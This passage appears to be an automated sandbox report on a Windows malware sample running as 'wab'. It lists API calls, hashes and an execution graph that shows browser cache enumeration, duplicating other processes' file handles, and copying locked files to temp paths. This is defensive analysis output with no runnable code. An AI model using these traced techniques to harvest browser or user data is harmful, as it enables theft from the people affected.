                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1794362364-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,352D1D66,00000000,00000000,?,352D5C88,352D1D66,00000000,00000000,00000000,?,352D5E85,00000006,FlsSetValue), ref: 352D5D13
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,352D5C88,352D1D66,00000000,00000000,00000000,?,352D5E85,00000006,FlsSetValue,352DE190,FlsSetValue,00000000,00000364,?,352D5BC8), ref: 352D5D1F
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,352D5C88,352D1D66,00000000,00000000,00000000,?,352D5E85,00000006,FlsSetValue,352DE190,FlsSetValue,00000000), ref: 352D5D2D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                    • Opcode ID: 2e043396526d545b5f6b48d17d101ccad6e0e71e60f165ee07f580de7a593766
                                                                                                                                                                                                                    • Instruction ID: 28d8775267dbd472f76bd16b2a3e5d6d716e036aaf338b5de34674901ed30a8b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e043396526d545b5f6b48d17d101ccad6e0e71e60f165ee07f580de7a593766
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C017536B65726AFD7114A68DC4CE46BBD9AF457F2B510620E92AE7180DFA0D402C6F0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetOEMCP.KERNEL32(00000000,?,?,352D6C7C,?), ref: 352D6A1E
                                                                                                                                                                                                                    • GetACP.KERNEL32(00000000,?,?,352D6C7C,?), ref: 352D6A35
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: |l-5
                                                                                                                                                                                                                    • API String ID: 0-939093168
                                                                                                                                                                                                                    • Opcode ID: aebf2a82413b4c77c25df62970d49ccebc0a82b210ed542c404ab93b8d2b534b
                                                                                                                                                                                                                    • Instruction ID: 90ddb277ea3df398987ceebaba902b4b0071e9a80917e09f068ba4096985f7a0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aebf2a82413b4c77c25df62970d49ccebc0a82b210ed542c404ab93b8d2b534b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F03C30924609CBE700EBA4D448B6CBBB1BB4033AF649384E4789A1D1DFB669468B81
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:7.2%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:8.7%
                                                                                                                                                                                                                    Signature Coverage:1%
                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                    Total number of Limit Nodes:74
39528->39529 39530 40bad5 39529->39530 39531 40b273 27 API calls 39529->39531 39532 40baeb 39530->39532 39533 40bade DeleteFileW 39530->39533 39534 40b89a 39531->39534 39535 40b04b ??3@YAXPAX 39532->39535 39533->39532 39536 438552 134 API calls 39534->39536 39537 40baf3 39535->39537 39538 40b8a4 39536->39538 39537->39092 39539 40bacd 39538->39539 39541 4251c4 137 API calls 39538->39541 39540 443d90 111 API calls 39539->39540 39540->39530 39564 40b8b8 39541->39564 39542 40bac6 39543 40b8bd memset 39546 425413 17 API calls 39546->39564 39549 40a71b MultiByteToWideChar 39549->39564 39550 40a734 MultiByteToWideChar 39550->39564 39551 4253af 17 API calls 39551->39564 39552 4253cf 17 API calls 39552->39564 39553 40b9b5 memcmp 39553->39564 39554 4099c6 2 API calls 39554->39564 39555 404423 37 API calls 39555->39564 39557 40bb3e memset memcpy 39558 4251c4 137 API calls 39558->39564 39564->39542 39564->39543 39564->39546 39564->39549 39564->39550 39564->39551 39564->39552 39564->39553 39564->39554 39564->39555 39564->39557 39564->39558 39565 40ba5f memcmp 39564->39565 39566 4099f4 3 API calls 39564->39566 40315 4253ef 39564->40315 39565->39564 39566->39564 39567->39094 39569 40aed1 39568->39569 39570 40aec7 FindClose 39568->39570 39569->39027 39570->39569 39572 4099d7 39571->39572 39573 4099da memcpy 39571->39573 39572->39573 39573->39077 39575 40b2cc 27 API calls 39574->39575 39576 44543f 39575->39576 39577 409d1f 6 API calls 39576->39577 39578 44544f 39577->39578 40431 409b98 GetFileAttributesW 39578->40431 39580 44545e 39581 445476 39580->39581 39582 40b6ef 252 API calls 39580->39582 39583 40b2cc 27 API calls 39581->39583 39582->39581 39584 445482 39583->39584 39585 409d1f 6 API calls 39584->39585 39586 445492 39585->39586 40432 409b98 GetFileAttributesW 39586->40432 39588 4454a1 39589 4454b9 39588->39589 39590 40b6ef 252 API calls 39588->39590 39589->39108 39590->39589 39591->39107 39592->39124 39593->39130 39594->39167 39595->39149 39596->39194 39597->39194 
39598->39177 39599->39205 39600->39207 39601->39209 39603 414c2e 16 API calls 39602->39603 39604 40c2ae 39603->39604 39674 40c1d3 39604->39674 39609 40c3be 39626 40a8ab 39609->39626 39610 40afcf 2 API calls 39611 40c2fd FindFirstUrlCacheEntryW 39610->39611 39612 40c3b6 39611->39612 39613 40c31e wcschr 39611->39613 39614 40b04b ??3@YAXPAX 39612->39614 39615 40c331 39613->39615 39616 40c35e FindNextUrlCacheEntryW 39613->39616 39614->39609 39617 40a8ab 9 API calls 39615->39617 39616->39613 39618 40c373 GetLastError 39616->39618 39621 40c33e wcschr 39617->39621 39619 40c3ad FindCloseUrlCache 39618->39619 39620 40c37e 39618->39620 39619->39612 39622 40afcf 2 API calls 39620->39622 39621->39616 39623 40c34f 39621->39623 39624 40c391 FindNextUrlCacheEntryW 39622->39624 39625 40a8ab 9 API calls 39623->39625 39624->39613 39624->39619 39625->39616 39790 40a97a 39626->39790 39629 40a8cc 39629->39216 39630 40a8d0 7 API calls 39630->39629 39795 40b1ab ??3@YAXPAX ??3@YAXPAX 39631->39795 39633 40c3dd 39634 40b2cc 27 API calls 39633->39634 39635 40c3e7 39634->39635 39796 414592 RegOpenKeyExW 39635->39796 39637 40c3f4 39638 40c50e 39637->39638 39639 40c3ff 39637->39639 39653 405337 39638->39653 39640 40a9ce 4 API calls 39639->39640 39641 40c418 memset 39640->39641 39797 40aa1d 39641->39797 39799 405220 39653->39799 39675 40ae18 9 API calls 39674->39675 39681 40c210 39675->39681 39676 40ae51 9 API calls 39676->39681 39677 40c264 39678 40aebe FindClose 39677->39678 39680 40c26f 39678->39680 39679 40add4 2 API calls 39679->39681 39686 40e5ed memset memset 39680->39686 39681->39676 39681->39677 39681->39679 39682 40c231 _wcsicmp 39681->39682 39683 40c1d3 35 API calls 39681->39683 39682->39681 39684 40c248 39682->39684 39683->39681 39699 40c084 22 API calls 39684->39699 39687 414c2e 16 API calls 39686->39687 39688 40e63f 39687->39688 39689 409d1f 6 API calls 39688->39689 39690 40e658 39689->39690 39700 409b98 GetFileAttributesW 39690->39700 39692 40e667 39694 409d1f 6 API calls 
39692->39694 39695 40e680 39692->39695 39694->39695 39701 409b98 GetFileAttributesW 39695->39701 39696 40e68f 39697 40c2d8 39696->39697 39702 40e4b2 39696->39702 39697->39609 39697->39610 39699->39681 39700->39692 39701->39696 39723 40e01e 39702->39723 39704 40e593 39705 40e5b0 39704->39705 39706 40e59c DeleteFileW 39704->39706 39707 40b04b ??3@YAXPAX 39705->39707 39706->39705 39709 40e5bb 39707->39709 39708 40e521 39708->39704 39746 40e175 39708->39746 39711 40e5c4 CloseHandle 39709->39711 39712 40e5cc 39709->39712 39711->39712 39714 40b633 ??3@YAXPAX 39712->39714 39713 40e573 39715 40e584 39713->39715 39716 40e57c FindCloseChangeNotification 39713->39716 39717 40e5db 39714->39717 39789 40b1ab ??3@YAXPAX ??3@YAXPAX 39715->39789 39716->39715 39720 40b633 ??3@YAXPAX 39717->39720 39719 40e540 39719->39713 39766 40e2ab 39719->39766 39721 40e5e3 39720->39721 39721->39697 39724 406214 22 API calls 39723->39724 39725 40e03c 39724->39725 39726 40e16b 39725->39726 39727 40dd85 74 API calls 39725->39727 39726->39708 39728 40e06b 39727->39728 39728->39726 39729 40afcf ??2@YAPAXI ??3@YAXPAX 39728->39729 39730 40e08d OpenProcess 39729->39730 39731 40e0a4 GetCurrentProcess DuplicateHandle 39730->39731 39735 40e152 39730->39735 39732 40e0d0 GetFileSize 39731->39732 39733 40e14a CloseHandle 39731->39733 39736 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39732->39736 39733->39735 39734 40e160 39738 40b04b ??3@YAXPAX 39734->39738 39735->39734 39737 406214 22 API calls 39735->39737 39739 40e0ea 39736->39739 39737->39734 39738->39726 39740 4096dc CreateFileW 39739->39740 39741 40e0f1 CreateFileMappingW 39740->39741 39742 40e140 CloseHandle CloseHandle 39741->39742 39743 40e10b MapViewOfFile 39741->39743 39742->39733 39744 40e13b FindCloseChangeNotification 39743->39744 39745 40e11f WriteFile UnmapViewOfFile 39743->39745 39744->39742 39745->39744 39747 40e18c 39746->39747 39748 406b90 11 API calls 39747->39748 39749 40e19f 39748->39749 39750 40e1a7 memset 39749->39750 
39751 40e299 39749->39751 39757 40e1e8 39750->39757 39752 4069a3 ??3@YAXPAX ??3@YAXPAX 39751->39752 39753 40e2a4 39752->39753 39753->39719 39754 406e8f 13 API calls 39754->39757 39755 406b53 SetFilePointerEx ReadFile 39755->39757 39756 40dd50 _wcsicmp 39756->39757 39757->39754 39757->39755 39757->39756 39758 40e283 39757->39758 39762 40742e 8 API calls 39757->39762 39763 40aae3 wcslen wcslen _memicmp 39757->39763 39764 40e244 _snwprintf 39757->39764 39759 40e291 39758->39759 39760 40e288 ??3@YAXPAX 39758->39760 39761 40aa04 ??3@YAXPAX 39759->39761 39760->39759 39761->39751 39762->39757 39763->39757 39765 40a8d0 7 API calls 39764->39765 39765->39757 39767 40e2c2 39766->39767 39768 406b90 11 API calls 39767->39768 39779 40e2d3 39768->39779 39769 40e4a0 39770 4069a3 ??3@YAXPAX ??3@YAXPAX 39769->39770 39772 40e4ab 39770->39772 39771 406e8f 13 API calls 39771->39779 39772->39719 39773 406b53 SetFilePointerEx ReadFile 39773->39779 39774 40e489 39775 40aa04 ??3@YAXPAX 39774->39775 39777 40e491 39775->39777 39776 40dd50 _wcsicmp 39776->39779 39777->39769 39778 40e497 ??3@YAXPAX 39777->39778 39778->39769 39779->39769 39779->39771 39779->39773 39779->39774 39779->39776 39780 40dd50 _wcsicmp 39779->39780 39783 40742e 8 API calls 39779->39783 39784 40e3e0 memcpy 39779->39784 39785 40e3b3 wcschr 39779->39785 39786 40e3fb memcpy 39779->39786 39787 40e416 memcpy 39779->39787 39788 40e431 memcpy 39779->39788 39781 40e376 memset 39780->39781 39782 40aa29 6 API calls 39781->39782 39782->39779 39783->39779 39784->39779 39785->39779 39786->39779 39787->39779 39788->39779 39789->39704 39792 40a980 39790->39792 39791 40a8bb 39791->39629 39791->39630 39792->39791 39793 40a995 _wcsicmp 39792->39793 39794 40a99c wcscmp 39792->39794 39793->39792 39794->39792 39795->39633 39796->39637 39798 40aa23 RegEnumValueW 39797->39798 39800 405335 39799->39800 39801 40522a 39799->39801 39800->39223 39802 40b2cc 27 API calls 39801->39802 39930 403a29 39929->39930 39944 403bed memset memset 39930->39944 
39932 403ae7 39957 40b1ab ??3@YAXPAX ??3@YAXPAX 39932->39957 39933 403a3f memset 39938 403a2f 39933->39938 39935 403aef 39935->39291 39936 409d1f 6 API calls 39936->39938 39937 409b98 GetFileAttributesW 39937->39938 39938->39932 39938->39933 39938->39936 39938->39937 39939 40a8d0 7 API calls 39938->39939 39939->39938 39941 40a051 GetFileTime FindCloseChangeNotification 39940->39941 39942 4039ca CompareFileTime 39940->39942 39941->39942 39942->39291 39943->39290 39945 414c2e 16 API calls 39944->39945 39946 403c38 39945->39946 39947 409719 2 API calls 39946->39947 39948 403c3f wcscat 39947->39948 39949 414c2e 16 API calls 39948->39949 39950 403c61 39949->39950 39951 409719 2 API calls 39950->39951 39952 403c68 wcscat 39951->39952 39958 403af5 39952->39958 39955 403af5 20 API calls 39956 403c95 39955->39956 39956->39938 39957->39935 39959 403b02 39958->39959 39960 40ae18 9 API calls 39959->39960 39968 403b37 39960->39968 39961 403bdb 39963 40aebe FindClose 39961->39963 39962 40add4 wcscmp wcscmp 39962->39968 39964 403be6 39963->39964 39964->39955 39965 40ae18 9 API calls 39965->39968 39966 40ae51 9 API calls 39966->39968 39967 40aebe FindClose 39967->39968 39968->39961 39968->39962 39968->39965 39968->39966 39968->39967 39969 40a8d0 7 API calls 39968->39969 39969->39968 39971 409d1f 6 API calls 39970->39971 39972 404190 39971->39972 39985 409b98 GetFileAttributesW 39972->39985 40264 413f4f 40237->40264 40240 413f37 K32GetModuleFileNameExW 40241 413f4a 40240->40241 40241->39383 40265 413f2f 40264->40265 40266 413f54 40264->40266 40265->40240 40265->40241 40267 40a804 8 API calls 40266->40267 40268 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40267->40268 40268->40265 40272->39406 40273->39430 40275 409cf9 GetVersionExW 40274->40275 40276 409d0a 40274->40276 40275->40276 40276->39436 40276->39440 40277->39442 40278->39445 40279->39447 40280->39512 40282 40bba5 40281->40282 40335 40cc26 40282->40335 40285 40bd4b 40363 40cc0c 
40285->40363 40290 40b2cc 27 API calls 40291 40bbef 40290->40291 40356 40ccf0 40291->40356 40293 40bbf5 40293->40285 40360 40ccb4 40293->40360 40296 40cf04 17 API calls 40297 40bc2e 40296->40297 40298 40bd43 40297->40298 40299 40b2cc 27 API calls 40297->40299 40300 40cc0c 4 API calls 40298->40300 40301 40bc40 40299->40301 40300->40285 40302 40ccf0 _wcsicmp 40301->40302 40303 40bc46 40302->40303 40303->40298 40314->39527 40327 409a74 GetTempFileNameW 40326->40327 40328 409a66 GetWindowsDirectoryW 40326->40328 40327->39526 40328->40327 40371 4096c3 CreateFileW 40335->40371 40337 40cc34 40338 40cc3d GetFileSize 40337->40338 40339 40bbca 40337->40339 40340 40afcf 2 API calls 40338->40340 40339->40285 40347 40cf04 40339->40347 40341 40cc64 40340->40341 40372 40a2ef ReadFile 40341->40372 40343 40cc71 40373 40ab4a MultiByteToWideChar 40343->40373 40345 40cc95 FindCloseChangeNotification 40346 40b04b ??3@YAXPAX 40345->40346 40346->40339 40348 40b633 ??3@YAXPAX 40347->40348 40349 40cf14 40348->40349 40379 40b1ab ??3@YAXPAX ??3@YAXPAX 40349->40379 40351 40bbdd 40351->40285 40351->40290 40352 40cf1b 40352->40351 40354 40cfef 40352->40354 40380 40cd4b 40352->40380 40355 40cd4b 14 API calls 40354->40355 40355->40351 40357 40cd3f 40356->40357 40358 40ccfd 40356->40358 40357->40293 40358->40357 40359 40cd26 _wcsicmp 40358->40359 40359->40357 40359->40358 40361 40aa29 6 API calls 40360->40361 40362 40bc26 40361->40362 40362->40296 40364 40b633 ??3@YAXPAX 40363->40364 40365 40cc15 40364->40365 40366 40aa04 ??3@YAXPAX 40365->40366 40367 40cc1d 40366->40367 40429 40b1ab ??3@YAXPAX ??3@YAXPAX 40367->40429 40369 40b7d4 memset CreateFileW 40369->39519 40369->39520 40371->40337 40372->40343 40374 40ab6b 40373->40374 40378 40ab93 40373->40378 40375 40a9ce 4 API calls 40374->40375 40376 40ab74 40375->40376 40377 40ab7c MultiByteToWideChar 40376->40377 40377->40378 40378->40345 40379->40352 40381 40cd7b 40380->40381 40414 40aa29 40381->40414 40383 40cef5 40384 40aa04 ??3@YAXPAX 40383->40384 
40385 40cefd 40384->40385 40385->40352 40387 40aa29 6 API calls 40388 40ce1d 40387->40388 40389 40aa29 6 API calls 40388->40389 40390 40ce3e 40389->40390 40391 40ce6a 40390->40391 40422 40abb7 wcslen memmove 40390->40422 40392 40ce9f 40391->40392 40425 40abb7 wcslen memmove 40391->40425 40394 40a8d0 7 API calls 40392->40394 40397 40ceb5 40394->40397 40395 40ce56 40423 40aa71 wcslen 40395->40423 40404 40a8d0 7 API calls 40397->40404 40399 40ce8b 40426 40aa71 wcslen 40399->40426 40401 40ce5e 40424 40abb7 wcslen memmove 40401->40424 40402 40ce93 40427 40abb7 wcslen memmove 40402->40427 40406 40cecb 40404->40406 40428 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40406->40428 40415 40aa33 40414->40415 40421 40aa63 40414->40421 40416 40aa44 40415->40416 40417 40aa38 wcslen 40415->40417 40418 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 40416->40418 40417->40416 40419 40aa4d 40418->40419 40420 40aa51 memcpy 40419->40420 40419->40421 40420->40421 40421->40383 40421->40387 40422->40395 40423->40401 40424->40391 40425->40399 40426->40402 40427->40392 40429->40369 40431->39580 40432->39588 40502 44def7 40503 44df07 40502->40503 40504 44df00 ??3@YAXPAX 40502->40504 40505 44df17 40503->40505 40506 44df10 ??3@YAXPAX 40503->40506 40504->40503 40507 44df27 40505->40507 40508 44df20 ??3@YAXPAX 40505->40508 40506->40505 40509 44df37 40507->40509 40510 44df30 ??3@YAXPAX 40507->40510 40508->40507 40510->40509 37862 44188c 147 API calls 37672 44dea5 37673 44deb5 FreeLibrary 37672->37673 37674 44dec3 37672->37674 37673->37674 40511 40b0b5 ??3@YAXPAX ??3@YAXPAX 40512 4148b6 FindResourceW 40513 4148f9 40512->40513 40514 4148cf SizeofResource 40512->40514 40514->40513 40515 4148e0 LoadResource 40514->40515 40515->40513 40516 4148ee LockResource 40515->40516 40516->40513 40433 442774 40434 442799 40433->40434 40435 44277b 40433->40435 40458 42bf4c 40434->40458 40450 42b63e 40435->40450 40442 4427ba 40472 42c00a 11 API calls 40442->40472 40444 441897 40445 4418ea 40444->40445 40446 442bd4 
40444->40446 40447 4418e2 40444->40447 40446->40445 40474 441409 memset 40446->40474 40447->40445 40473 4414a9 12 API calls 40447->40473 40475 42b4ec 40450->40475 40452 42b64c 40481 42b5e4 40452->40481 40454 42b65e 40455 42b66d 40454->40455 40488 42b3c6 11 API calls 40454->40488 40457 42b1b5 17 API calls 40455->40457 40457->40434 40459 42bf5f 40458->40459 40460 42bf56 40458->40460 40462 42bfae memset 40459->40462 40463 415b2c 11 API calls 40459->40463 40464 42bf84 40459->40464 40461 415a91 memset 40460->40461 40461->40459 40470 42bf91 40462->40470 40465 42bf7f 40463->40465 40491 42b896 memset 40464->40491 40465->40464 40466 42bf98 40465->40466 40466->40462 40468 42bf8b 40492 42c02e memset 40468->40492 40471 42bfcf memcpy 40470->40471 40471->40442 40472->40444 40473->40445 40474->40446 40476 42b4ff 40475->40476 40477 415a91 memset 40476->40477 40478 42b52c 40477->40478 40479 42b553 memcpy 40478->40479 40480 42b545 40478->40480 40479->40480 40480->40452 40482 42b5eb 40481->40482 40486 42b604 40481->40486 40489 42b896 memset 40482->40489 40484 42b5f5 40490 42b896 memset 40484->40490 40486->40454 40487 42b5ff 40487->40454 40488->40455 40489->40484 40490->40487 40491->40468 40492->40470 37856 415304 ??3@YAXPAX 37863 441892 147 API calls 37863->37863 37675 415320 realloc 37676 415340 37675->37676 37677 41534d 37675->37677 37679 416760 11 API calls 37677->37679 37679->37676 40517 441b3f 40527 43a9f6 40517->40527 40519 441b61 40700 4386af memset 40519->40700 40521 44189a 40522 4418e2 40521->40522 40524 442bd4 40521->40524 40525 4418ea 40522->40525 40701 4414a9 12 API calls 40522->40701 40524->40525 40702 441409 memset 40524->40702 40528 43aa20 40527->40528 40529 43aadf 40527->40529 40528->40529 40530 43aa34 memset 40528->40530 40529->40519 40531 43aa56 40530->40531 40532 43aa4d 40530->40532 40703 43a6e7 40531->40703 40711 42c02e memset 40532->40711 40537 43aad3 40713 4169a7 11 API calls 40537->40713 40538 43aaae 40538->40529 40538->40537 40553 43aae5 40538->40553 40539 
43ac18 40542 43ac47 40539->40542 40715 42bbd5 memcpy memcpy memcpy memset memcpy 40539->40715 40543 43aca8 40542->40543 40716 438eed 16 API calls 40542->40716 40547 43acd5 40543->40547 40718 4233ae 11 API calls 40543->40718 40546 43ac87 40717 4233c5 16 API calls 40546->40717 40719 423426 11 API calls 40547->40719 40551 43ace1 40720 439811 163 API calls 40551->40720 40552 43a9f6 161 API calls 40552->40553 40553->40529 40553->40539 40553->40552 40714 439bbb 22 API calls 40553->40714 40555 43acfd 40560 43ad2c 40555->40560 40721 438eed 16 API calls 40555->40721 40557 43ad19 40722 4233c5 16 API calls 40557->40722 40559 43ad58 40723 44081d 163 API calls 40559->40723 40560->40559 40563 43add9 40560->40563 40727 423426 11 API calls 40563->40727 40564 43ae3a memset 40565 43ae73 40564->40565 40728 42e1c0 147 API calls 40565->40728 40566 43adab 40725 438c4e 163 API calls 40566->40725 40567 43ad6c 40567->40529 40567->40566 40724 42370b memset memcpy memset 40567->40724 40571 43adcc 40726 440f84 12 API calls 40571->40726 40572 43ae96 40729 42e1c0 147 API calls 40572->40729 40575 43aea8 40576 43aec1 40575->40576 40730 42e199 147 API calls 40575->40730 40577 43af00 40576->40577 40731 42e1c0 147 API calls 40576->40731 40577->40529 40581 43af1a 40577->40581 40582 43b3d9 40577->40582 40732 438eed 16 API calls 40581->40732 40587 43b3f6 40582->40587 40588 43b4c8 40582->40588 40583 43b60f 40583->40529 40791 4393a5 17 API calls 40583->40791 40586 43af2f 40733 4233c5 16 API calls 40586->40733 40773 432878 12 API calls 40587->40773 40592 43b4f2 40588->40592 40779 42bbd5 memcpy memcpy memcpy memset memcpy 40588->40779 40590 43af51 40734 423426 11 API calls 40590->40734 40780 43a76c 21 API calls 40592->40780 40594 43af7d 40735 423426 11 API calls 40594->40735 40598 43b529 40781 44081d 163 API calls 40598->40781 40599 43b462 40775 423330 11 API calls 40599->40775 40600 43af94 40736 423330 11 API calls 40600->40736 40604 43afca 40737 423330 11 API calls 40604->40737 40605 43b47e 40609 43b497 
40605->40609 40776 42374a memcpy memset memcpy memcpy memcpy 40605->40776 40606 43b544 40610 43b55c 40606->40610 40782 42c02e memset 40606->40782 40607 43b428 40607->40599 40774 432b60 16 API calls 40607->40774 40777 4233ae 11 API calls 40609->40777 40783 43a87a 163 API calls 40610->40783 40612 43afdb 40738 4233ae 11 API calls 40612->40738 40617 43b56c 40621 43b58a 40617->40621 40784 423330 11 API calls 40617->40784 40618 43b4b1 40778 423399 11 API calls 40618->40778 40620 43afee 40739 44081d 163 API calls 40620->40739 40785 440f84 12 API calls 40621->40785 40622 43b4c1 40787 42db80 163 API calls 40622->40787 40627 43b592 40786 43a82f 16 API calls 40627->40786 40630 43b5b4 40788 438c4e 163 API calls 40630->40788 40632 43b5cf 40789 42c02e memset 40632->40789 40634 43b005 40634->40529 40638 43b01f 40634->40638 40740 42d836 163 API calls 40634->40740 40635 43b1ef 40750 4233c5 16 API calls 40635->40750 40638->40635 40748 423330 11 API calls 40638->40748 40749 42d71d 163 API calls 40638->40749 40639 43b212 40751 423330 11 API calls 40639->40751 40641 43b087 40741 4233ae 11 API calls 40641->40741 40642 43add4 40642->40583 40790 438f86 16 API calls 40642->40790 40645 43b22a 40752 42ccb5 11 API calls 40645->40752 40648 43b23f 40753 4233ae 11 API calls 40648->40753 40649 43b10f 40744 423330 11 API calls 40649->40744 40651 43b257 40754 4233ae 11 API calls 40651->40754 40655 43b129 40745 4233ae 11 API calls 40655->40745 40656 43b26e 40755 4233ae 11 API calls 40656->40755 40659 43b09a 40659->40649 40742 42cc15 19 API calls 40659->40742 40743 4233ae 11 API calls 40659->40743 40660 43b282 40756 43a87a 163 API calls 40660->40756 40662 43b13c 40746 440f84 12 API calls 40662->40746 40664 43b29d 40757 423330 11 API calls 40664->40757 40667 43b15f 40747 4233ae 11 API calls 40667->40747 40668 43b2af 40669 43b2b8 40668->40669 40670 43b2ce 40668->40670 40758 4233ae 11 API calls 40669->40758 40759 440f84 12 API calls 40670->40759 40674 43b2c9 40761 4233ae 11 API calls 40674->40761 40675 
43b2da 40760 42370b memset memcpy memset 40675->40760 40678 43b2f9 40762 423330 11 API calls 40678->40762 40680 43b30b 40763 423330 11 API calls 40680->40763 40682 43b325 40764 423399 11 API calls 40682->40764 40684 43b332 40765 4233ae 11 API calls 40684->40765 40686 43b354 40766 423399 11 API calls 40686->40766 40688 43b364 40767 43a82f 16 API calls 40688->40767 40690 43b370 40768 42db80 163 API calls 40690->40768 40692 43b380 40769 438c4e 163 API calls 40692->40769 40694 43b39e 40770 423399 11 API calls 40694->40770 40696 43b3ae 40771 43a76c 21 API calls 40696->40771 40698 43b3c3 40772 423399 11 API calls 40698->40772 40700->40521 40701->40525 40702->40524 40704 43a6f5 40703->40704 40707 43a765 40703->40707 40704->40707 40792 42a115 40704->40792 40707->40529 40712 4397fd memset 40707->40712 40709 43a73d 40709->40707 40710 42a115 147 API calls 40709->40710 40710->40707 40711->40531 40712->40538 40713->40529 40714->40553 40715->40542 40716->40546 40717->40543 40718->40547 40719->40551 40720->40555 40721->40557 40722->40560 40723->40567 40724->40566 40725->40571 40726->40642 40727->40564 40728->40572 40729->40575 40730->40576 40731->40576 40732->40586 40733->40590 40734->40594 40735->40600 40736->40604 40737->40612 40738->40620 40739->40634 40740->40641 40741->40659 40742->40659 40743->40659 40744->40655 40745->40662 40746->40667 40747->40638 40748->40638 40749->40638 40750->40639 40751->40645 40752->40648 40753->40651 40754->40656 40755->40660 40756->40664 40757->40668 40758->40674 40759->40675 40760->40674 40761->40678 40762->40680 40763->40682 40764->40684 40765->40686 40766->40688 40767->40690 40768->40692 40769->40694 40770->40696 40771->40698 40772->40642 40773->40607 40774->40599 40775->40605 40776->40609 40777->40618 40778->40622 40779->40592 40780->40598 40781->40606 40782->40610 40783->40617 40784->40621 40785->40627 40786->40622 40787->40630 40788->40632 40789->40642 40790->40583 40791->40529 40793 42a175 40792->40793 40795 42a122 40792->40795 
40793->40707 40798 42b13b 147 API calls 40793->40798 40795->40793 40796 42a115 147 API calls 40795->40796 40799 43a174 40795->40799 40823 42a0a8 147 API calls 40795->40823 40796->40795 40798->40709 40813 43a196 40799->40813 40814 43a19e 40799->40814 40800 43a306 40800->40813 40836 4388c4 14 API calls 40800->40836 40803 42a115 147 API calls 40803->40814 40804 415a91 memset 40804->40814 40805 43a642 40805->40813 40839 4169a7 11 API calls 40805->40839 40807 4165ff 11 API calls 40807->40814 40809 43a635 40838 42c02e memset 40809->40838 40813->40795 40814->40800 40814->40803 40814->40804 40814->40807 40814->40813 40824 42ff8c 40814->40824 40832 439504 13 API calls 40814->40832 40833 4312d0 147 API calls 40814->40833 40834 42be4c memcpy memcpy memcpy memset memcpy 40814->40834 40835 43a121 11 API calls 40814->40835 40815 43a325 40815->40805 40815->40809 40815->40813 40817 42bf4c 14 API calls 40815->40817 40818 4169a7 11 API calls 40815->40818 40819 42b5b5 memset memcpy 40815->40819 40820 42b63e 14 API calls 40815->40820 40822 4165ff 11 API calls 40815->40822 40837 42bfcf memcpy 40815->40837 40817->40815 40818->40815 40819->40815 40820->40815 40822->40815 40823->40795 40825 43817e 139 API calls 40824->40825 40827 42ff99 40825->40827 40826 42ff9d 40826->40814 40827->40826 40828 42ffe3 40827->40828 40829 42ffd0 40827->40829 40841 4169a7 11 API calls 40828->40841 40840 4169a7 11 API calls 40829->40840 40832->40814 40833->40814 40834->40814 40835->40814 40836->40815 40837->40815 40838->40805 40839->40813 40840->40826 40841->40826 40861 441939 40886 441247 40861->40886 40864 4418ea 40865 441897 40867 4418e2 40865->40867 40870 442bd4 40865->40870 40867->40864 40889 4414a9 12 API calls 40867->40889 40870->40864 40890 441409 memset 40870->40890 40871 4308a4 40872 4308bc 40871->40872 40881 4308e4 40871->40881 40891 42c0c8 147 API calls 40872->40891 40875 430931 40875->40865 40876 4308d3 40877 4308e8 40876->40877 40878 4308d8 40876->40878 40892 42b896 memset 40877->40892 40896 
